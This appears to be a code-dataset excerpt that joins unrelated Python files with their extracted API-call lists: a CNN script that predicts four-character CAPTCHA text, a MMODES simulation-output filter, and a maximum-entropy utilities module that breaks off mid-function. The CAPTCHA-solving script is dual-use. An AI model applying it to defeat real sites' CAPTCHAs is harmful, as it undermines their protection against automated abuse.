'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['col_unit_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(col_unit_ned, scp_ecf, absolute_coords=False)\n', (23272, 23318), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((27224, 27250), 'numpy.log10', 'numpy.log10', (['tipping_point'], {}), '(tipping_point)\n', (27235, 27250), False, 'import numpy\n'), ((31861, 31939), 'sarpy.io.general.format_function.ComplexFormatFunction', 'ComplexFormatFunction', (['raw_dtype', 'complex_order'], {'band_dimension': 'band_dimension'}), '(raw_dtype, complex_order, band_dimension=band_dimension)\n', (31882, 31939), False, 'from sarpy.io.general.format_function import FormatFunction, ComplexFormatFunction\n'), ((42778, 42802), 'copy.deepcopy', 'copy.deepcopy', (['nitf_dict'], {}), '(nitf_dict)\n', (42791, 42802), False, 'import copy\n'), ((5268, 5305), 'sarpy.io.complex.sicd_elements.CollectionInfo.CollectionInfoType', 'CollectionInfoType', ([], {'CountryCodes': '[cc]'}), '(CountryCodes=[cc])\n', (5286, 5305), False, 'from sarpy.io.complex.sicd_elements.CollectionInfo import CollectionInfoType\n'), ((6424, 6457), 'sarpy.io.complex.sicd_elements.ImageData.ImageDataType', 'ImageDataType', ([], {'SCPPixel': 'scp_pixel'}), '(SCPPixel=scp_pixel)\n', (6437, 6457), False, 'from sarpy.io.complex.sicd_elements.ImageData import ImageDataType\n'), ((6755, 6775), 'sarpy.io.complex.sicd_elements.GeoData.SCPType', 'SCPType', ([], {'ECF': 'scp_ecf'}), '(ECF=scp_ecf)\n', (6762, 6775), False, 'from sarpy.io.complex.sicd_elements.GeoData import GeoDataType, SCPType\n'), ((10837, 10870), 'sarpy.io.complex.sicd_elements.Grid.WgtTypeType', 'WgtTypeType', ([], {'WindowName': '"""HAMMING"""'}), "(WindowName='HAMMING')\n", (10848, 10870), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((10911, 10944), 'sarpy.io.complex.sicd_elements.Grid.WgtTypeType', 'WgtTypeType', ([], {'WindowName': '"""HAMMING"""'}), "(WindowName='HAMMING')\n", (10922, 10944), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((16799, 16842), 'sarpy.io.complex.sicd_elements.CollectionInfo.CollectionInfoType', 'CollectionInfoType', ([], {'CollectorName': 'sensor_id'}), '(CollectorName=sensor_id)\n', (16817, 16842), False, 'from sarpy.io.complex.sicd_elements.CollectionInfo import CollectionInfoType\n'), ((19029, 19048), 'numpy.any', 'numpy.any', (['(arr != 0)'], {}), '(arr != 0)\n', (19038, 19048), False, 'import numpy\n'), ((20975, 21011), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensrb.ACFT_LOC[:12]'], {}), '(mensrb.ACFT_LOC[:12])\n', (20989, 21011), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((21026, 21064), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensrb.ACFT_LOC[12:25]'], {}), '(mensrb.ACFT_LOC[12:25])\n', (21040, 21064), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((21170, 21204), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensrb.RP_LOC[:12]'], {}), '(mensrb.RP_LOC[:12])\n', (21184, 21204), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((21219, 21255), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensrb.RP_LOC[12:25]'], {}), '(mensrb.RP_LOC[12:25])\n', (21233, 21255), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((22217, 22253), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensra.ACFT_LOC[:10]'], {}), '(mensra.ACFT_LOC[:10])\n', (22231, 22253), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((22268, 22306), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensra.ACFT_LOC[10:21]'], {}), '(mensra.ACFT_LOC[10:21])\n', (22282, 22306), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((22412, 22446), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensra.CP_LOC[:10]'], {}), '(mensra.CP_LOC[:10])\n', (22426, 22446), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((22461, 22497), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensra.CP_LOC[10:21]'], {}), '(mensra.CP_LOC[10:21])\n', (22475, 22497), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((37975, 38060), 'logging.error', 'logging.error', (['"""Image segment appears to multiband with switch complex ordering"""'], {}), "('Image segment appears to multiband with switch complex ordering'\n )\n", (37988, 38060), False, 'import logging\n'), ((6616, 6636), 'sarpy.io.complex.sicd_elements.GeoData.SCPType', 'SCPType', ([], {'ECF': 'scp_ecf'}), '(ECF=scp_ecf)\n', (6623, 6636), False, 'from sarpy.io.complex.sicd_elements.GeoData import GeoDataType, SCPType\n'), ((7337, 7368), 'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'UVectECF': 'row_unit'}), '(UVectECF=row_unit)\n', (7349, 7368), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((7390, 7421), 'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'UVectECF': 'col_unit'}), '(UVectECF=col_unit)\n', (7402, 7421), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((11021, 11054), 'sarpy.io.complex.sicd_elements.Grid.WgtTypeType', 'WgtTypeType', ([], {'WindowName': '"""HANNING"""'}), "(WindowName='HANNING')\n", (11032, 11054), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((11095, 11128), 'sarpy.io.complex.sicd_elements.Grid.WgtTypeType', 'WgtTypeType', ([], {'WindowName': '"""HANNING"""'}), "(WindowName='HANNING')\n", (11106, 11128), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((17557, 17596), 'numpy.deg2rad', 'numpy.deg2rad', (['the_sicd.SCPCOA.GrazeAng'], {}), '(the_sicd.SCPCOA.GrazeAng)\n', (17570, 17596), False, 'import numpy\n'), ((17687, 17726), 'numpy.deg2rad', 'numpy.deg2rad', (['the_sicd.SCPCOA.TwistAng'], {}), '(the_sicd.SCPCOA.TwistAng)\n', (17700, 17726), False, 'import numpy\n'), ((17804, 17827), 'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'SS': 'row_ss'}), '(SS=row_ss)\n', (17816, 17827), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((17833, 17856), 'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'SS': 'col_ss'}), '(SS=col_ss)\n', (17845, 17856), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((18739, 18765), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['value[:10]'], {}), '(value[:10])\n', (18753, 18765), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((18792, 18820), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['value[10:21]'], {}), '(value[10:21])\n', (18806, 18820), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((19004, 19023), 'numpy.isfinite', 'numpy.isfinite', (['arr'], {}), '(arr)\n', (19018, 19023), False, 'import numpy\n'), ((33217, 33229), 'numpy.log', 'numpy.log', (['(2)'], {}), '(2)\n', (33226, 33229), False, 'import numpy\n'), ((26085, 26098), 'numpy.log', 'numpy.log', (['(10)'], {}), '(10)\n', (26094, 26098), False, 'import numpy\n'), ((26673, 26686), 'numpy.log', 'numpy.log', (['(10)'], {}), '(10)\n', (26682, 26686), False, 'import numpy\n'), ((33373, 33385), 'numpy.log', 'numpy.log', (['(2)'], {}), '(2)\n', (33382, 33385), False, 'import numpy\n')]
|
# -*- coding: UTF-8 -*-
import numpy as np
import pandas as pd
import torch
import time
from torch.autograd import Variable
import captcha_setting
import my_dataset
from captcha_cnn_model import CNN
def main():
print('开始对图片进行预测')
cnn = CNN()
cnn.eval()
cnn.load_state_dict(torch.load('model.pkl'))
print("加载神经网络训练的模型.")
result = []
predict_dataloader = my_dataset.get_predict_data_loader()
for i, (image_name, images, labels) in enumerate(predict_dataloader):
start = time.time()
image = images
vimage = Variable(image)
predict_label = cnn(vimage)
c0 = captcha_setting.ALL_CHAR_SET[np.argmax(predict_label[0, 0:captcha_setting.ALL_CHAR_SET_LEN].data.numpy())]
c1 = captcha_setting.ALL_CHAR_SET[np.argmax(
predict_label[0, captcha_setting.ALL_CHAR_SET_LEN:2 * captcha_setting.ALL_CHAR_SET_LEN].data.numpy())]
c2 = captcha_setting.ALL_CHAR_SET[np.argmax(
predict_label[0, 2 * captcha_setting.ALL_CHAR_SET_LEN:3 * captcha_setting.ALL_CHAR_SET_LEN].data.numpy())]
c3 = captcha_setting.ALL_CHAR_SET[np.argmax(
predict_label[0, 3 * captcha_setting.ALL_CHAR_SET_LEN:4 * captcha_setting.ALL_CHAR_SET_LEN].data.numpy())]
res = '%s%s%s%s' % (c0, c1, c2, c3)
cost = '%.2f ms' % ((time.time() - start) * 1000)
result.append([image_name[0],res, cost])
print('经过训练后的神经网络预测图片的结果为:')
data = np.hstack([result])
res = pd.DataFrame(data, columns=['图片名称', '预测结果', '耗费时间'])
print(res)
if __name__ == '__main__':
main()
|
[
"pandas.DataFrame",
"torch.autograd.Variable",
"torch.load",
"numpy.hstack",
"time.time",
"captcha_cnn_model.CNN",
"my_dataset.get_predict_data_loader"
] |
[((246, 251), 'captcha_cnn_model.CNN', 'CNN', ([], {}), '()\n', (249, 251), False, 'from captcha_cnn_model import CNN\n'), ((383, 419), 'my_dataset.get_predict_data_loader', 'my_dataset.get_predict_data_loader', ([], {}), '()\n', (417, 419), False, 'import my_dataset\n'), ((1442, 1461), 'numpy.hstack', 'np.hstack', (['[result]'], {}), '([result])\n', (1451, 1461), True, 'import numpy as np\n'), ((1472, 1524), 'pandas.DataFrame', 'pd.DataFrame', (['data'], {'columns': "['图片名称', '预测结果', '耗费时间']"}), "(data, columns=['图片名称', '预测结果', '耗费时间'])\n", (1484, 1524), True, 'import pandas as pd\n'), ((291, 314), 'torch.load', 'torch.load', (['"""model.pkl"""'], {}), "('model.pkl')\n", (301, 314), False, 'import torch\n'), ((510, 521), 'time.time', 'time.time', ([], {}), '()\n', (519, 521), False, 'import time\n'), ((562, 577), 'torch.autograd.Variable', 'Variable', (['image'], {}), '(image)\n', (570, 577), False, 'from torch.autograd import Variable\n'), ((1320, 1331), 'time.time', 'time.time', ([], {}), '()\n', (1329, 1331), False, 'import time\n')]
|
#!/usr/bin/python3
# Script to shape the desired output to be processed (MMODES)
# the datatable way
# @author: <NAME>
# Creation: 09/06/2019
import os
import re
import numpy as np
import datatable as dt
from datatable import f
def log(cons, media):
'''
Writes information of consortium object to file
'''
logf = 'simulations.txt'
p = re.compile(r'#+ SIMULATION (\d+) #+')
if os.path.isfile(logf): # parse last simulation number
with open(logf) as l:
for line in l.readlines():
num_sim = p.search(line)
if num_sim:
head = " SIMULATION "+str(int(num_sim.group(1))+1)+" "
else:
head = " SIMULATION 1 "
lines = '{:{fill}{align}{width}}'.format(head,
fill = '#',
align = '^',
width = 30) + "\n"
lines += cons.__str__()
pers = ', '.join([per["PERTURBATION"] for per in media])
lines += "\nPERTURBATIONS: " + pers + "\n\n"
with open(logf, "a") as l:
l.write(lines)
return
def equidistant(df, n):
sample = np.linspace(df.nrows-1,1,n).astype('int')
sample.sort()
return df[sample, :]
def tsv_filter(medium = "", flux = "", txpers = {}, inplace = False, v = 0, equif = True, bin = False):
'''
Function that filters medium and fluxes TSV files based on perturbation times.
INPUTS -> medium: string, path to medium file;
flux: string, path to medium file;
txpers: dictionary, time : perturbation;
inplace: bool, whether overwrite input paths (default False);
v: float, volume magnitude to obtain medium concentrations;
equif: bool, whether write an additional fluxes filtered file,
with 100 equidistant points (default True)
OUTPUT -> it returns None, writes 2(3) TSV files
'''
dfs = []
if not medium:
print("Medium parameter wasn't supplied, it won't be generated.")
else:
dfs.append([dt.fread(medium), medium, 0])
if v != 0:
for i in range(1,dfs[0][0].ncols): dfs[0][0][:,i] = dfs[0][0][:,f[i]/v]
if not flux:
print("Medium parameter wasn't supplied, it won't be generated.")
else:
dfs.append([dt.fread(flux), flux, 1])
if not medium:
print("You must supply a txpers parameter. Exitting function...")
return
for log, path, n in dfs:
log[:,'Perturbations'] = "FALSE" # now last column (-1)
log[-1,-1] = "END"
if len(txpers) > 1:
for tp, per in txpers.items():
if tp == 0:
log[0,-1] = per
else:
# take last time that matches <= perturbation time
log[f.time == log[f.time < tp, f.time][-1,-1], -1] = per
# if per == 'START':
# log[0,-1] = 'START'
# else:
# # take last index that matches <= perturbation time
# log[f.time == log[f.time <= tp, f.time][-1,-1], -1] = per
else:
log[0, -1] = 'START'
if n != 0 and equif:
log_equif = equidistant(log,100) # take 100 equidistant rows
log_equif.to_csv(path[:-4] + '_equi' + '.tsv')
del(log_equif)
# TODO: I don't know how to implement a condroll with datatable
# We aren't currentyly using it, anyway
log = log[f.Perturbations != "FALSE", :]
if inplace:
log.to_csv(path)
else:
log.to_csv(path[:-4] + '_filtered' + '.tsv')
|
[
"os.path.isfile",
"datatable.fread",
"numpy.linspace",
"re.compile"
] |
[((359, 396), 're.compile', 're.compile', (['"""#+ SIMULATION (\\\\d+) #+"""'], {}), "('#+ SIMULATION (\\\\d+) #+')\n", (369, 396), False, 'import re\n'), ((404, 424), 'os.path.isfile', 'os.path.isfile', (['logf'], {}), '(logf)\n', (418, 424), False, 'import os\n'), ((1072, 1103), 'numpy.linspace', 'np.linspace', (['(df.nrows - 1)', '(1)', 'n'], {}), '(df.nrows - 1, 1, n)\n', (1083, 1103), True, 'import numpy as np\n'), ((1986, 2002), 'datatable.fread', 'dt.fread', (['medium'], {}), '(medium)\n', (1994, 2002), True, 'import datatable as dt\n'), ((2240, 2254), 'datatable.fread', 'dt.fread', (['flux'], {}), '(flux)\n', (2248, 2254), True, 'import datatable as dt\n')]
|
"""
Utility routines for the maximum entropy module.
Most of them are either Python replacements for the corresponding Fortran
routines or wrappers around matrices to allow the maxent module to
manipulate ndarrays, scipy sparse matrices, and PySparse matrices a
common interface.
Perhaps the logsumexp() function belongs under the utils/ branch where other
modules can access it more easily.
Copyright: <NAME>, 2003-2006
License: BSD-style (see LICENSE.txt in main source directory)
"""
# Future imports must come before any code in 2.5
from __future__ import division
from __future__ import print_function
from builtins import range
__author__ = "<NAME>"
__version__ = '2.0'
import random
import math
import cmath
import numpy as np
#from numpy import log, exp, asarray, ndarray, empty
import scipy.sparse
from scipy.misc import logsumexp
def feature_sampler(vec_f, auxiliary_sampler):
"""
A generator function for tuples (F, log_q_xs, xs)
Parameters
----------
vec_f : function
Pass `vec_f` as a (vectorized) function that operates on a vector of
samples xs = {x1,...,xn} and returns a feature matrix (m x n), where m
is some number of feature components.
auxiliary_sampler : function
Pass `auxiliary_sampler` as a function that returns a tuple
(xs, log_q_xs) representing a sample to use for sampling (e.g.
importance sampling) on the sample space of the model.
xs : list, 1d ndarray, or 2d matrix (n x d)
We require len(xs) == n.
Yields
------
tuples (F, log_q_xs, xs)
F : matrix (m x n)
log_q_xs : as returned by auxiliary_sampler
xs : as returned by auxiliary_sampler
"""
while True:
xs, log_q_xs = auxiliary_sampler()
F = vec_f(xs) # compute feature matrix from points
yield F, log_q_xs, xs
def dictsample(freq, size=None, return_probs=None):
"""
Create a sample of the given size from the specified discrete distribution.
Parameters
----------
freq : a dictionary
A mapping from values x_j in the sample space to probabilities (or
unnormalized frequencies).
size : a NumPy size parameter (like a shape tuple)
Something passable to NumPy as a size argument to np.random.choice(...)
return_probs : int, optional (default 0)
None: don't return pmf values at each sample point
'prob': return pmf values at each sample point
'logprob': return log pmf values at each sample point
Returns
-------
Returns a sample of the given size from the keys of the given
dictionary `freq` with probabilities given according to the
values (normalized to 1). Optionally returns the probabilities
under the distribution of each observation.
Example
-------
>>> freq = {'a': 10, 'b': 15, 'c': 20}
>>> dictsample(freq, size=1)
array([c, b, b, b, b, b, c, b, b, b], dtype=object)
"""
n = len(freq)
probs = np.fromiter(freq.values(), float)
probs /= probs.sum()
indices = np.random.choice(np.arange(n), size=size, p=probs)
labels = np.empty(n, dtype=object)
for i, label in enumerate(freq.keys()):
labels[i] = label
sample = labels[indices]
if return_probs is None:
return sample
sampleprobs = probs[indices]
if return_probs == 'prob':
return sample, sampleprobs
elif return_probs == 'logprob':
return sample, np.log(sampleprobs)
else:
raise ValueError('return_probs must be "prob", "logprob", or None')
def dictsampler(freq, size=None, return_probs=None):
"""
A generator of samples of the given size from the specified discrete
distribution.
Parameters
----------
freq : a dictionary
A mapping from values x_j in the sample space to probabilities (or
unnormalized frequencies).
size : a NumPy size parameter (like a shape tuple)
Something passable to NumPy as a size argument to np.random.choice(...)
return_probs : int, optional (default 0)
None: don't return pmf values at each sample point
'prob': return pmf values at each sample point
'logprob': return log pmf values at each sample point
Returns
-------
Returns a sample of the given size from the keys of the given
dictionary `freq` with probabilities given according to the
values (normalized to 1). Optionally returns the probabilities
under the distribution of each observation.
Example
-------
>>> freq = {'a': 10, 'b': 15, 'c': 20}
>>> g = dictsample_gen(freq, size=1)
>>> next(g)
array([c, b, b, b, b, b, c, b, b, b], dtype=object)
"""
while True:
yield dictsample(freq, size=size, return_probs=return_probs)
def auxiliary_sampler_scipy(auxiliary, dimensions=1, n=10**5):
"""
Sample (once) from the given scipy.stats distribution
Parameters
----------
auxiliary : a scipy.stats distribution object (rv_frozen)
Returns
-------
sampler : function
sampler(), when called with no parameters, returns a tuple
(xs, log_q_xs), where:
xs : matrix (n x d): [x_1, ..., x_n]: a sample
log_q_xs: log pdf values under the auxiliary sampler for each x_j
"""
def sampler():
xs = auxiliary.rvs(size=(n, dimensions))
log_q_xs = np.log(auxiliary.pdf(xs.T)).sum(axis=0)
return (xs, log_q_xs)
return sampler
def _logsumexpcomplex(values):
"""A version of logsumexp that should work if the values passed are
complex-numbered, such as the output of robustarraylog(). So we
expect:
cmath.exp(logsumexpcomplex(robustarraylog(values))) ~= sum(values,axis=0)
except for a small rounding error in both real and imag components.
The output is complex. (To recover just the real component, use
A.real, where A is the complex return value.)
"""
if len(values) == 0:
return 0.0
iterator = iter(values)
# Get the first element
while True:
# Loop until we have a value greater than -inf
try:
b_i = next(iterator) + 0j
except StopIteration:
# empty
return float('-inf')
if b_i.real != float('-inf'):
break
# Now the rest
for a_i in iterator:
a_i += 0j
if b_i.real > a_i.real:
increment = robustlog(1.+cmath.exp(a_i - b_i))
# print "Increment is " + str(increment)
b_i = b_i + increment
else:
increment = robustlog(1.+cmath.exp(b_i - a_i))
# print "Increment is " + str(increment)
b_i = a_i + increment
return b_i
def logsumexp_naive(values):
"""For testing logsumexp(). Subject to numerical overflow for large
values (e.g. 720).
"""
s = 0.0
for x in values:
s += math.exp(x)
return math.log(s)
def robustlog(x):
"""Returns log(x) if x > 0, the complex log cmath.log(x) if x < 0,
or float('-inf') if x == 0.
"""
if x == 0.:
return float('-inf')
elif type(x) is complex or (type(x) is float and x < 0):
return cmath.log(x)
else:
return math.log(x)
def _robustarraylog(x):
""" An array version of robustlog. Operates on a real array x.
"""
arraylog = empty(len(x), np.complex64)
for i in range(len(x)):
xi = x[i]
if xi > 0:
arraylog[i] = math.log(xi)
elif xi == 0.:
arraylog[i] = float('-inf')
else:
arraylog[i] = cmath.log(xi)
return arraylog
# def arrayexp(x):
# """
# OBSOLETE?
#
# Returns the elementwise antilog of the real array x.
#
# We try to exponentiate with np.exp() and, if that fails, with
# python's math.exp(). np.exp() is about 10 times faster but throws
# an OverflowError exception for numerical underflow (e.g. exp(-800),
# whereas python's math.exp() just returns zero, which is much more
# helpful.
# """
# try:
# ex = np.exp(x)
# except OverflowError:
# print("Warning: OverflowError using np.exp(). Using slower Python"\
# " routines instead!")
# ex = np.empty(len(x), float)
# for j in range(len(x)):
# ex[j] = math.exp(x[j])
# return ex
#
# def arrayexpcomplex(x):
# """
# OBSOLETE?
#
# Returns the elementwise antilog of the vector x.
#
# We try to exponentiate with np.exp() and, if that fails, with python's
# math.exp(). np.exp() is about 10 times faster but throws an
# OverflowError exception for numerical underflow (e.g. exp(-800),
# whereas python's math.exp() just returns zero, which is much more
# helpful.
#
# """
# try:
# ex = np.exp(x).real
# except OverflowError:
# ex = np.empty(len(x), float)
# try:
# for j in range(len(x)):
# ex[j] = math.exp(x[j])
# except TypeError:
# # Perhaps x[j] is complex. If so, try using the complex
# # exponential and returning the real part.
# for j in range(len(x)):
# ex[j] = cmath.exp(x[j]).real
# return ex
def sample_wr(population, k):
"""Chooses k random elements (with replacement) from a population.
(From the Python Cookbook).
"""
n = len(population)
_random, _int = random.random, int # speed hack
return [population[_int(_random() * n)] for i in range(k)]
def evaluate_feature_matrix(feature_functions,
xs,
vectorized=True,
format='csc_matrix',
dtype=float,
verbose=False):
"""Evaluate a (m x n) matrix of features `F` of the sample `xs` as:
F[i, :] = f_i(xs[:])
if xs is 1D, or as:
F[i, j] = f_i(xs[:, j])
if xs is 2D, for each feature function `f_i` in `feature_functions`.
Parameters
----------
feature_functions : a list of m feature functions f_i.
xs : either:
1. a (n x d) matrix representing n d-dimensional
observations xs[j, :] for j=1,...,n.
2. a 1d array or sequence (e.g list) of observations xs[j]
for j=1,...,n.
vectorized : bool (default True)
If True, the feature functions f_i are assumed to be vectorized;
then these will be passed all observations xs at once, in turn.
If False, the feature functions f_i will be evaluated one at a time.
format : str (default 'csc_matrix')
Options: 'ndarray', 'csc_matrix', 'csr_matrix', 'dok_matrix'.
If you have enough memory, it may be faster to create a dense
ndarray and then construct a e.g. CSC matrix from this.
Returns
-------
F : (m x n) matrix (in the given format: ndarray / csc_matrix / etc.)
Matrix of evaluated features.
"""
m = len(feature_functions)
if isinstance(xs, np.ndarray) and xs.ndim == 2:
n, d = xs.shape
if d == 1 and vectorized:
# xs may be a column vector, i.e. (n x 1) array.
# In this case, reshape it to a 1d array. This
# makes it easier to define functions that
# operate on only one variable (the usual case)
# given that sklearn's interface now forces 2D
# arrays X when calling .transform(X) and .fit(X).
xs = np.reshape(xs, n)
else:
n, d = len(xs), 1
if format in ('dok_matrix', 'csc_matrix', 'csr_matrix'):
F = scipy.sparse.dok_matrix((m, n), dtype=dtype)
elif format == 'ndarray':
F = np.empty((m, n), dtype=dtype)
else:
raise ValueError('matrix format not recognized')
for i, f_i in enumerate(feature_functions):
if verbose:
print('Computing feature {i} of {m} ...'.format(i=i, m=m))
if vectorized:
F[i::m, :] = f_i(xs)
else:
for j in range(n):
f_i_x = f_i(xs[j])
if f_i_x != 0:
F[i,j] = f_i_x
if format == 'csc_matrix':
return F.tocsc()
elif format == 'csr_matrix':
return F.tocsr()
else:
return F
# def densefeatures(f, x):
# """Returns a dense array of non-zero evaluations of the vector
# functions fi in the list f at the point x.
# """
#
# return np.array([fi(x) for fi in f])
# def densefeaturematrix(f, sample, verbose=False):
# """Compute an (m x n) dense array of non-zero evaluations of the
# scalar functions fi in the list f at the points x_1,...,x_n in the
# list sample.
# """
#
# # Was: return np.array([[fi(x) for fi in f] for x in sample])
#
# m = len(f)
# n = len(sample)
#
# F = np.empty((m, n), float)
# for i in range(m):
# f_i = f[i]
# for j in range(n):
# x = sample[j]
# F[i,j] = f_i(x)
# return F
# def sparsefeatures(f, x, format='csc_matrix'):
# """Compute an mx1 sparse matrix of non-zero evaluations of the
# scalar functions f_1,...,f_m in the list f at the point x.
#
# """
# m = len(f)
# if format in ('dok_matrix', 'csc_matrix', 'csr_matrix'):
# sparsef = scipy.sparse.dok_matrix((m, 1))
# else:
# raise ValueError("sparse matrix format not recognized")
#
# for i in range(m):
# f_i_x = f[i](x)
# if f_i_x != 0:
# sparsef[i, 0] = f_i_x
#
# if format == 'csc_matrix':
# print("Converting to CSC matrix ...")
# return sparsef.tocsc()
# elif format == 'csr_matrix':
# print("Converting to CSR matrix ...")
# return sparsef.tocsr()
# else:
# return sparsef
# def sparsefeaturematrix(f, sample, format='csc_matrix', verbose=False):
# """Compute an (m x n) sparse matrix of non-zero evaluations of the
# scalar functions f_1,...,f_m in the list f at the points x_1,...,x_n
# in the sequence 'sample'.
#
# """
# m = len(f)
# n = len(sample)
# if format in ('dok_matrix', 'csc_matrix', 'csr_matrix'):
# sparseF = scipy.sparse.dok_matrix((m, n))
# else:
# raise ValueError("sparse matrix format not recognized")
#
# for i in range(m):
# if verbose:
# print('Computing feature {i} of {m}'.format(i=i, m=m))
# f_i = f[i]
# for j in range(n):
# x = sample[j]
# f_i_x = f_i(x)
# if f_i_x != 0:
# sparseF[i,j] = f_i_x
#
# if format == 'csc_matrix':
# return sparseF.tocsc()
# elif format == 'csr_matrix':
# return sparseF.tocsr()
# else:
# return sparseF
# def sparsefeaturematrix_vectorized(feature_functions, xs, format='csc_matrix'):
# """
# Evaluate a (m x n) matrix of features `F` of the sample `xs` as:
#
# F[i, j] = f_i(xs[:, j])
#
# Parameters
# ----------
# feature_functions : a list of feature functions f_i.
#
# xs : either:
# 1. a (d x n) matrix representing n d-dimensional
# observations xs[: ,j] for j=1,...,n.
# 2. a 1d array or sequence (e.g list) of observations xs[j]
# for j=1,...,n.
#
# The feature functions f_i are assumed to be vectorized. These will be
# passed all observations xs at once, in turn.
#
# Note: some samples may be more efficient / practical to compute
# features one sample observation at a time (e.g. generated). For these
# cases, use sparsefeaturematrix().
#
# Only pass sparse=True if you need the memory savings. If you want a
# sparse matrix but have enough memory, it may be faster to
# pass dense=True and then construct a CSC matrix from the dense NumPy
# array.
#
# """
# m = len(feature_functions)
#
# if isinstance(xs, np.ndarray) and xs.ndim == 2:
# d, n = xs.shape
# else:
# n = len(xs)
# if not sparse:
# F = np.empty((m, n), float)
# else:
# import scipy.sparse
# F = scipy.sparse.lil_matrix((m, n), dtype=float)
#
# for i, f_i in enumerate(feature_functions):
# F[i::m, :] = f_i(xs)
#
# if format == 'csc_matrix':
# return F.tocsc()
# elif format == 'csr_matrix':
# return F.tocsr()
# else:
# return F
def old_vec_feature_function(feature_functions, sparse=False):
"""
Create and return a vectorized function `features(xs)` that
evaluates an (n x m) matrix of features `F` of the sample `xs` as:
F[j, i] = f_i(xs[:, j])
Parameters
----------
feature_functions : a list of feature functions f_i.
`xs` will be passed to these functions as either:
1. an (n x d) matrix representing n d-dimensional
observations xs[j, :] for j=1,...,n.
2. a 1d array or sequence (e.g list) of observations xs[j]
for j=1,...,n.
The feature functions f_i are assumed to be vectorized. These will be
passed all observations xs at once, in turn.
Note: some samples may be more efficient / practical to compute
features of one sample observation at a time (e.g. generated).
Only pass sparse=True if you need the memory savings. If you want a
sparse matrix but have enough memory, it may be faster to
pass sparse=False and then construct a CSC matrix from the dense NumPy
array.
"""
if sparse:
import scipy.sparse
m = len(feature_functions)
def vectorized_features(xs):
if isinstance(xs, np.ndarray) and xs.ndim == 2:
n, d = xs.shape
else:
n = len(xs)
if not sparse:
F = np.empty((n, m), float)
else:
F = scipy.sparse.lil_matrix((n, m), dtype=float)
# Equivalent:
# for i, f_i in enumerate(feature_functions):
# for k in range(len(xs)):
# F[len(feature_functions)*k+i, :] = f_i(xs[k])
for i, f_i in enumerate(feature_functions):
F[:, i::m] = f_i(xs)
if not sparse:
return F
else:
return scipy.sparse.csc_matrix(F)
return vectorized_features
def dotprod(u,v):
"""
This is a wrapper around general dense or sparse dot products.
It is not necessary except as a common interface for supporting
ndarray, scipy spmatrix, and PySparse arrays.
Returns the dot product of the (1 x m) sparse array u with the
(m x 1) (dense) numpy array v.
"""
#print "Taking the dot product u.v, where"
#print "u has shape " + str(u.shape)
#print "v = " + str(v)
try:
dotprod = np.array([0.0]) # a 1x1 array. Required by spmatrix.
u.matvec(v, dotprod)
return dotprod[0] # extract the scalar
except AttributeError:
# Assume u is a dense array.
return np.dot(u,v)
def innerprod(A,v):
"""
This is a wrapper around general dense or sparse dot products.
It is not necessary except as a common interface for supporting
ndarray, scipy spmatrix, and PySparse arrays.
Returns the inner product of the (m x n) dense or sparse matrix A
with the n-element dense array v. This is a wrapper for A.dot(v) for
dense arrays and spmatrix objects, and for A.matvec(v, result) for
PySparse matrices.
"""
# We assume A is sparse.
(m, n) = A.shape
vshape = v.shape
try:
(p,) = vshape
except ValueError:
(p, q) = vshape
if n != p:
raise TypeError("matrix dimensions are incompatible")
if isinstance(v, np.ndarray):
try:
# See if A is sparse
A.matvec
except AttributeError:
# It looks like A is dense
return np.dot(A, v)
else:
# Assume A is sparse
if scipy.sparse.isspmatrix(A):
innerprod = A.matvec(v) # This returns a float32 type. Why???
return innerprod
else:
# Assume PySparse format
innerprod = np.empty(m, float)
A.matvec(v, innerprod)
return innerprod
elif scipy.sparse.isspmatrix(v):
return A * v
else:
raise TypeError("unsupported types for inner product")
def innerprodtranspose(A,v):
"""
This is a wrapper around general dense or sparse dot products.
It is not necessary except as a common interface for supporting
ndarray, scipy spmatrix, and PySparse arrays.
Computes A^T V, where A is a dense or sparse matrix and V is a numpy
array. If A is sparse, V must be a rank-1 array, not a matrix. This
function is efficient for large matrices A. This is a wrapper for
A.T.dot(v) for dense arrays and spmatrix objects, and for
A.matvec_transp(v, result) for pysparse matrices.
"""
(m, n) = A.shape
#pdb.set_trace()
if hasattr(A, 'matvec_transp'):
# A looks like a PySparse matrix
if len(v.shape) == 1:
innerprod = np.empty(n, float)
